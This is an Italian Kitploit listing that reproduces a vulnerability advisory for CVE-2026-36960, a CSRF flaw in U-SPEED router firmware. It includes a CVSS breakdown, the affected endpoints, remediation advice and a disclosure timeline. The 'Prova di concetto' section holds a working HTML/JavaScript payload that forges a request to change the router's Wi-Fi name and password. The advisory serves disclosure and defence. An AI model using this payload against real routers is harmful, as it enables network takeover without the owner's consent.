Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-36960 — Proof-of-concept exploit per CVE-2026-36960, una vulnerabilità CSRF nel firmware del router U-SPEED che consente modifiche non autorizzate alla configurazione tramite richieste contraffatte. | Kitploit
Strumenti/GitHubGitHub/kirubel-cve/cve-2026-36960
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubkirubel-cve/cve-2026-36960

CVE-2026-36960

Proof-of-concept exploit per CVE-2026-36960, una vulnerabilità CSRF nel firmware del router U-SPEED che consente modifiche non autorizzate alla configurazione tramite richieste contraffatte.

Vedi Repository
3 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-36960: Cross-Site Request Forgery (CSRF) nell'interfaccia di gestione web

ID CVE: CVE-2026-36960 Data: 2026-04-29 Scopritore: Kirubel Solomne Vendor: U-SPEED Prodotto: Router U-SPEED Versione Firmware: V1.0.0 CWE: CWE-352 - Cross-Site Request Forgery (CSRF)


Descrizione

Il firmware V1.0.0 del router U-SPEED non implementa meccanismi di protezione CSRF come token anti-CSRF o una validazione rigorosa degli header Origin/Referer per gli endpoint API amministrativi. Un attaccante può creare una pagina web dannosa che invia richieste HTTP contraffatte agli endpoint di configurazione. Se un amministratore autenticato visita la pagina web dannosa, il router elabora la richiesta come un'azione amministrativa legittima.


Punteggio CVSS

Punteggio CVSS v3.1: 8.8 (Alto) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

MetricaValore
Vettore di attaccoRete
Complessità di attaccoBassa
Privilegi richiestiNessuno
Interazione utenteRichiesta
Impatto sulla riservatezzaAlto
Impatto sull'integritàAlto
Impatto sulla disponibilitàAlto

Endpoint interessati

EndpointFunzione
/api/setWlanConfigurazione della rete wireless
/api/telnetConfigurazione del servizio Telnet
Altri endpoint di configurazioneVarie funzioni amministrative

Prova di concetto

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

Comportamento previsto: La richiesta dovrebbe essere rifiutata a causa della mancanza del token CSRF. Comportamento effettivo: Il router accetta ed elabora la richiesta contraffatta.


Impatto

  • Modifica non autorizzata della configurazione del router
  • Presa di controllo della rete WiFi
  • Manipolazione del servizio Telnet
  • Denial of service per gli utenti legittimi

Rimedio

  • Implementare token anti-CSRF su tutti gli endpoint che modificano lo stato
  • Applicare una validazione rigorosa degli header Origin e Referer
  • Utilizzare l'attributo cookie SameSite=Strict

Cronologia della divulgazione

DataEvento
2026-04-29Vulnerabilità scoperta
2026-04-29Segnalata a MITRE
2026-04-29CVE-2026-36960 assegnato
2026-04-29Divulgazione pubblica

Riferimenti

  • MITRE CVE-2026-36960
  • CWE-352
  • Sito web del vendor
Scarica lo strumento